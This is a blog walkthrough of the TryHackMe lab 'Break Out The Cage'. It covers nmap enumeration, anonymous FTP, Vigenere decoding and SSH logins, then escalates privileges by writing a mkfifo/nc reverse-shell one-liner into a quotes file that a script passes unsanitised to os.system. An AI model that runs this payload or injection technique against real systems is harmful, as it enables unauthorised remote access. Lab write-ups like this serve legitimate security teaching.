Post

TryHackMe: Break Out The Cage

Posted
Preview Image
By pullupnghost
8 min read
TryHackMe: Break Out The Cage

Break Out The Cage was a simple room yet fun, was very direct on what it wanted, and although i took a different approach from most write-ups i found, i was able to get the same result in the end on my own. And that is really positive, there isn’t usually a correct way to do it, as long as you do it in a way that you find most comfortable with and understand, you’ll get to where you want to.

Room https://tryhackme.com/room/breakoutthecage1

Initial Enumeration

Nmap Scan

We start with our nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 10.10.174.197 && nmap -T4 -n -sC -sV -Pn -p- --min-rate 1000 --max-retries 3 10.10.174.197
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 17:57 BST
Warning: 10.10.174.197 giving up on port because retransmission cap hit (3).
Nmap scan report for 10.10.174.197
Host is up (0.080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             396 May 25  2020 dad_tasks
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:-
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
|   256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|_  256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.93 seconds

FTP

We see that we can log in as anonymous, and inside there is a file called dad_tasks. Logging in and downloading it to our machine, we can view the file that had some encoded text inside:

1

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds

We try decoding with base64, but get a message with some mixed letters:

1
2
3
4
5
6
7
8

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.

Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

There weren’t many options based on the output, it was either caesar cipher or vigenere cipher. Going to dcode.fr we were able to use the “automatic decryption” option for vigenere cipher and were able to get the decoded text: dad_tasks Decode

1
2
3
4
5
6
7
8

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes

Web 80

We get what seems to be a password, but with no username to use. And to see if we find any, we go to the web page on port 80: Web 80

Shell as weston

On the home page, we see some text talking about the website and who’s runningit, and we can see that the supposed password is weston’s. And with that, we can log in via ssh:

1
2
3
4

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh weston@10.10.174.197                           
weston@10.10.174.197's password: 
weston@national-treasure:~$

Enumerating weston we couldn’t find much, but looking around, we start to get some random messages on our shell:

1
2
3

Broadcast message from cage@national-treasure (somewhere) (Mon Mar 31 17:12:01 
                                                                               
“Youll be seeing a lot of changes around here. Papas got a brand new bag.” — Face/Off

Shell as cage

Some broadcast messages from the user cage showing up. A bit suspicious, so we decide to look for files related to cage:

1
2
3
4
5
6

weston@national-treasure:/$ find / -group cage 2>/dev/null
/home/cage
/opt/.dads_scripts
/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files
/opt/.dads_scripts/.files/.quotes

We found the script responsible for showing the messages from time to time, and looking at its source code, we find something even more interesting:

1
2
3
4
5
6
7
8
9

weston@national-treasure:/opt/.dads_scripts$ cat spread_the_quotes.py
#!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random

lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)

No checks or whatsoever, this means that all we had to do was change the .quotes file to a reverse shell, as we do have permission, to get access to the cage user. First step is to send the payload to the .quotes file:

1

weston@national-treasure:/opt/.dads_scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc - 4444 >/tmp/f" > .files/.quotes

Then start a listener on our machine, and after that we just need to wait for the code to be run:

1
2
3
4
5
6
7

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444    
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.174.197] 51342
bash: cannot set terminal process group (1728): Inappropriate ioctl for device
bash: no job control in this shell
cage@national-treasure:~$

Inside we find a .ssh folder and get a better and more stable shell we can get the id_rsa key to our machine and log into cage via ssh:

1
2
3

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa cage@10.10.174.197   
cage@national-treasure:~$

We can also get the user flag from the only file available in cage’s home directory:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

cage@national-treasure:~$ ls -la
total 56
drwx------ 7 cage cage 4096 May 26  2020 .
drwxr-xr-x 4 root root 4096 May 26  2020 ..
lrwxrwxrwx 1 cage cage    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 cage cage  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 cage cage 3771 Apr  4  2018 .bashrc
drwx------ 2 cage cage 4096 May 25  2020 .cache
drwxrwxr-x 2 cage cage 4096 May 25  2020 email_backup
drwx------ 3 cage cage 4096 May 25  2020 .gnupg
drwxrwxr-x 3 cage cage 4096 May 25  2020 .local
-rw-r--r-- 1 cage cage  807 Apr  4  2018 .profile
-rw-rw-r-- 1 cage cage   66 May 25  2020 .selected_editor
drwx------ 2 cage cage 4096 May 26  2020 .ssh
-rw-r--r-- 1 cage cage    0 May 25  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cage cage  230 May 26  2020 Super_Duper_Checklist
-rw------- 1 cage cage 6761 May 26  2020 .viminfo
cage@national-treasure:~$ cat Super_Duper_Checklist 
1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: THM{REDACTED}

Shell as root

We also see a folder called email_backup, that inside had the backup of 3 emails. Email 1 and 2 didn’t have anything useful, but email 3 had another encoded text and some hints this time:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

cage@national-treasure:~/email_backup$ cat email_3
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.com

Hey Son

Buddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote down what it said. Could you look into it please? I think it could be something to do with hisaccount on here. I want to know what he's hiding from me... I might need a new agent. Pretty sure he's out to get me. The note said:

haiinspsyanileph

The guy also seems obsessed with my face lately. He came him wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldnt be able to FACE that!! 
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd. 

Regards

The Legend - Cage

After the encoded text we see some heavy mentioning of the word face, and since we already decoded vignere cipher we can try and decode the given text again with it, but now with a known key: Email Decode

The output, again, looks like some sort of password. We try the password for root and got in:

1
2
3

cage@national-treasure:/home$ su root
Password: 
root@national-treasure:/home#

And now all we had to do was find the root flag, which was inside a folder called email_backup, but this time the flag was inside email number 2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

root@national-treasure:~/email_backup# cat email_2
From - master@ActorsGuild.com
To - SeanArcher@BigManAgents.com

Dear Sean

I'm very pleased to here that Sean, you are a good disciple. Your power over him has become
strong... so strong that I feel the power to promote you from disciple to crony. I hope you
don't abuse your new found strength. To ascend yourself to this level please use this code:

THM{REDACTED}

Thank you

Sean Archer
TryHackMe
reverse shell ftp permissions
This post is licensed under CC BY 4.0 by the author.